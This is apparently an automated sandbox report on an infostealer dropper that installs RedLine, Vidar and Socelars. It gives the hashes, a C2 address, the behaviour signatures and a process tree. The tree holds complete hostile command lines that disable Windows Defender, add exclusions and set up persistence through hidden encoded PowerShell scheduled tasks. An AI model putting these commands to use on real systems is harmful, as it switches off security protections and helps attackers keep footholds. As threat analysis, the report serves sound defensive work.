Analysis
- max time kernel: 1803s
- max time network: 1802s
- platform: windows11_x64
- resource: win11
- submitted: 18-09-2021 21:25
- Static task static1
- Behavioral task behavioral1: sample setup_x86_x64_install.exe, resource win7-ja-20210916
- Behavioral task behavioral2: sample setup_x86_x64_install.exe, resource win7v20210408
- Behavioral task behavioral3: sample setup_x86_x64_install.exe, resource win7-de-20210916
- Behavioral task behavioral4: sample setup_x86_x64_install.exe, resource win11
- Behavioral task behavioral5: sample setup_x86_x64_install.exe, resource win10v20210408
- Behavioral task behavioral6: sample setup_x86_x64_install.exe, resource win10-jp
- Behavioral task behavioral7: sample setup_x86_x64_install.exe, resource win10-fr
General
- Target: setup_x86_x64_install.exe
- Size: 4.3MB
- MD5: c9b742fa61ccc9b3afa7217f3bfe2590
- SHA1: 7c1ddc294d0d9214c1e07ba239d24ffd2a01854d
- SHA256: 5967f1aef118ddfcd1d14d5cf3f29a62a845052c9ed9ce91587c0015b1047c58
- SHA512: 27b326724da58f967c49eb0f889af63636b2f7e49b1356bf76677fcc419f8eca41eb8f2fbddc4599f1f3e83fffa6a98a2b74315857f909d78254d4083c381f99
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Signatures
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4860 | 4936 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5328 | 4936 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 10808 | 4936 | rundll32.exe |
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 3 IoCs
Processes:
resource | yara_rule
behavioral4/memory/5712-272-0x0000000000000000-mapping.dmp | family_redline
behavioral4/memory/5712-275-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral4/memory/6080-357-0x0000000000000000-mapping.dmp | family_redline
Socelars Payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20873bc74eb80e0.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20873bc74eb80e0.exe | family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess 26 IoCs
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
Vidar Stealer 2 IoCs
Processes:
resource | yara_rule
behavioral4/memory/5132-291-0x00000000006F0000-0x00000000007C4000-memory.dmp | family_vidar
behavioral4/memory/4288-548-0x0000000000A90000-0x0000000000B64000-memory.dmp | family_vidar
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libcurlpp.dll | aspack_v212_v242
Blocklisted process makes network request 44 IoCs
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Ze2ro.exe
Executes dropped EXE 64 IoCs
Checks BIOS information in registry 2 TTPs 35 IoCs
BIOS information is often read in order to detect sandboxing environments.
Loads dropped DLL 33 IoCs
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Roaming\6389059.scr | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\service = "C:\\Users\\Admin\\AppData\\Local\\Temp\\543F.exe" | 543F.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Paeshaeqalata.exe\"" | Ze2ro.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
88 | ipinfo.io
131 | ipinfo.io
1 | ipinfo.io
16 | ip-api.com
16 | ipinfo.io
26 | ipinfo.io
52 | ipinfo.io
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
Suspicious use of SetThreadContext 10 IoCs
Processes:
description | pid | process | target process
PID 4716 set thread context of 5712 | 4716 | Sat2026ef0d60b87a3f5.exe | Sat2026ef0d60b87a3f5.exe
PID 860 set thread context of 4648 | 860 | WerFault.exe | 3379467.scr
PID 5924 set thread context of 6080 | 5924 | tmpD12A_tmp.exe | tmpD12A_tmp.exe
PID 5340 set thread context of 6188 | 5340 | NWXu0OucddIThdb5Qplybmke.exe | NWXu0OucddIThdb5Qplybmke.exe
PID 6352 set thread context of 7016 | 6352 | 4888429.exe | 4888429.exe
PID 588 set thread context of 6944 | 588 | fOdOVTJ4cAdpEqSN_u_aeghQ.exe | fOdOVTJ4cAdpEqSN_u_aeghQ.exe
PID 880 set thread context of 4848 | 880 | tmpB35D_tmp.exe | tmpB35D_tmp.exe
PID 6564 set thread context of 4252 | 6564 | services64.exe | explorer.exe
PID 3208 set thread context of 6380 | 3208 | 7A66.exe | 7A66.exe
PID 3472 set thread context of 6208 | 3472 | 9C56.exe | 9C56.exe
Drops file in Program Files directory 25 IoCs
Drops file in Windows directory 27 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 21 IoCs
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fOdOVTJ4cAdpEqSN_u_aeghQ.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fOdOVTJ4cAdpEqSN_u_aeghQ.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 7A66.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 7A66.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 7A66.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fOdOVTJ4cAdpEqSN_u_aeghQ.exe
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
5476 | schtasks.exe
4692 | schtasks.exe
1460 | schtasks.exe
6976 | schtasks.exe
6404 | schtasks.exe
1668 | schtasks.exe
Enumerates system info in registry 2 TTPs 45 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe, 6.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe, msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe, 6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe, msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
(The report repeats each of these operations once per process instance; only the distinct operations are listed here.)
Kills process with taskkill 1 IoCs
Processes:
pid | process
7636 | taskkill.exe
Modifies data under HKEY_USERS 46 IoCs
Processes:
process | description | ioc
sihclient.exe | Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ store keys CA, Disallowed, Root, SmartCardRoot, TrustedPeople and trust, each with its Certificates, CRLs and CTLs subkeys
sihclient.exe | Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\ store keys CA, Disallowed, TrustedPeople and trust, each with its Certificates, CRLs and CTLs subkeys
svchost.exe | Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
svchost.exe | Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache
svchost.exe | Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E
msiexec.exe | Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7
msiexec.exe | Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E
msiexec.exe | Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8
Modifies registry class 4 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | (process not recorded)
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | (process not recorded)
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | (process not recorded)
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | (process not recorded)
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B | setup_2.tmp
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B\Blob = [blob data removed] | setup_2.tmp
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [blob data removed] | installer.exe (recorded twice)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
4164 | powershell.exe
3748 | setup_2.tmp
(The 64 recorded entries are repeats of these two processes.)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3232 | (process name not recorded)
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid | process
6944 | fOdOVTJ4cAdpEqSN_u_aeghQ.exe
6380 | 7A66.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid | process | privileges adjusted
4792 | Sat20873bc74eb80e0.exe | SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35
1068 | Sat205eb4a2ece877a.exe | SeDebugPrivilege
3968 | Sat20ed203af5.exe | SeDebugPrivilege
4164 | powershell.exe | SeDebugPrivilege
4856 | Sat2071d99516dc03841.exe | SeDebugPrivilege
5788 | WerFault.exe | SeRestorePrivilege, SeBackupPrivilege
5900 | 1389700.scr | SeDebugPrivilege
860 | WerFault.exe | SeDebugPrivilege
4748 | 2.exe | SeDebugPrivilege
5516 | PublicDwlBrowser1100.exe | SeDebugPrivilege
2416 | cy3BD8IMClWAp4Sb5SGnjwsu.exe | SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid | process
3748 | setup_2.tmp
6496 | ultramediaburner.tmp
8784 | installer.exe
11260 | msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
8916 | cmd.exe
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
3232 | (process name not recorded)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid / process | target pid / process
3552 setup_x86_x64_install.exe | 4996 setup_installer.exe
4996 setup_installer.exe | 4780 setup_install.exe
4780 setup_install.exe | cmd.exe (PIDs 3524, 3528, 4288, 3848, 3956, 3600, 4932, 5032, 4696, 884, 1472, 1152, 4160, 4632)
3600 cmd.exe | 4792 Sat20873bc74eb80e0.exe
3528 cmd.exe | 3748 Sat20ecdfe3ee79f.exe
3524 cmd.exe | 4164 powershell.exe
4288 cmd.exe | 4548 Sat20578e6239.exe
3848 cmd.exe | 4856 Sat2071d99516dc03841.exe
5032 cmd.exe | 4824 Sat20627fa1c49.exe
(The report records each write two or three times; the 64 entries collapse to the source/target pairs above.)
Processes
Each entry gives the depth of the process in the tree, the image path and the command line as recorded, followed by the signatures matched for that process.
- [depth 1] C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  - Suspicious use of WriteProcessMemory
- [depth 2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- [depth 3] C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\setup_install.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\setup_install.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
  - Suspicious use of WriteProcessMemory
- [depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [depth 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Sat20ecdfe3ee79f.exe
  - Suspicious use of WriteProcessMemory
- [depth 5] C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20ecdfe3ee79f.exe
  command line: Sat20ecdfe3ee79f.exe
  - Executes dropped EXE
- [depth 6] C:\Users\Admin\Documents\vGjPBrntpoqDW5Fw9L47gEoc.exe
  command line: "C:\Users\Admin\Documents\vGjPBrntpoqDW5Fw9L47gEoc.exe"
  - Executes dropped EXE
- [depth 6] C:\Users\Admin\Documents\Qe7_6jGBbmEusoI6Z1m7NN9p.exe
  command line: "C:\Users\Admin\Documents\Qe7_6jGBbmEusoI6Z1m7NN9p.exe"
  - Executes dropped EXE
- [depth 7] C:\Windows\System32\Conhost.exe
  command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [depth 6] C:\Users\Admin\Documents\bM1lAK9_6qrDWhAvQCLFWrBk.exe
  command line: "C:\Users\Admin\Documents\bM1lAK9_6qrDWhAvQCLFWrBk.exe"
  - Executes dropped EXE
- [depth 7] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 240
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- [depth 6] C:\Users\Admin\Documents\magaTnk_A4jqEFJV8eORLHQK.exe
  command line: "C:\Users\Admin\Documents\magaTnk_A4jqEFJV8eORLHQK.exe"
  - Executes dropped EXE
- [depth 7] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 240
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of AdjustPrivilegeToken
- [depth 6] C:\Users\Admin\Documents\s6pnBFURtpRt_98USqtnaTCv.exe
  command line: "C:\Users\Admin\Documents\s6pnBFURtpRt_98USqtnaTCv.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- [depth 6] C:\Users\Admin\Documents\LKTftM5cJoptCgINSoW0ED8Q.exe
  command line: "C:\Users\Admin\Documents\LKTftM5cJoptCgINSoW0ED8Q.exe"
  - Executes dropped EXE
  - Drops file in Program Files directory
- [depth 7] C:\Windows\SysWOW64\schtasks.exe
  command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
  - Creates scheduled task(s)
- [depth 7] C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
  command line: "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
- [depth 8] C:\Users\Admin\Documents\lKyOf4nGgv7xYctM1LvW5lx5.exe
  command line: "C:\Users\Admin\Documents\lKyOf4nGgv7xYctM1LvW5lx5.exe"
- [depth 8] C:\Users\Admin\Documents\6TS6ei5M6qr67jBGWuixy3zm.exe
  command line: "C:\Users\Admin\Documents\6TS6ei5M6qr67jBGWuixy3zm.exe"
- [depth 9] C:\Users\Admin\AppData\Local\Temp\7zS27A2.tmp\Install.exe
  command line: .\Install.exe
- [depth 10] C:\Users\Admin\AppData\Local\Temp\7zS2BB9.tmp\Install.exe
  command line: .\Install.exe /S /site_id "668658"
  - Checks BIOS information in registry
  - Enumerates connected drives
  - Drops file in System32 directory
  - Enumerates system info in registry
- [depth 11] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
- [depth 12] C:\Windows\SysWOW64\forfiles.exe
  command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
- [depth 13] C:\Windows\SysWOW64\cmd.exe
  command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 15] C:\Windows\SysWOW64\Wbem\WMIC.exe
  command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 12] C:\Windows\SysWOW64\forfiles.exe
  command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
- [depth 13] C:\Windows\SysWOW64\cmd.exe
  command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 15] C:\Windows\SysWOW64\Wbem\WMIC.exe
  command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 12] C:\Windows\SysWOW64\forfiles.exe
  command line: forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
- [depth 13] C:\Windows\SysWOW64\cmd.exe
  command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 15] C:\Windows\SysWOW64\Wbem\WMIC.exe
  command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 12] C:\Windows\SysWOW64\forfiles.exe
  command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
- [depth 13] C:\Windows\SysWOW64\cmd.exe
  command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 15] C:\Windows\SysWOW64\Wbem\WMIC.exe
  command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
- [depth 11] C:\Windows\SysWOW64\forfiles.exe
  command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
- [depth 12] C:\Windows\SysWOW64\cmd.exe
  command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
- [depth 13] \??\c:\windows\SysWOW64\reg.exe
  command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
- [depth 13] \??\c:\windows\SysWOW64\reg.exe
  command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
- [depth 11] C:\Windows\SysWOW64\forfiles.exe
  command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
- [depth 12] C:\Windows\SysWOW64\cmd.exe
  command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzRAcrBGo" /SC once /ST 09:36:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 14:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\HcqbKbT.exe\" W8 /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\rqTLrt6ooAYbGkY2aAhbYxPP.exe"C:\Users\Admin\Documents\rqTLrt6ooAYbGkY2aAhbYxPP.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 2409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe"C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exeC:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe7⤵
- Executes dropped EXE
-
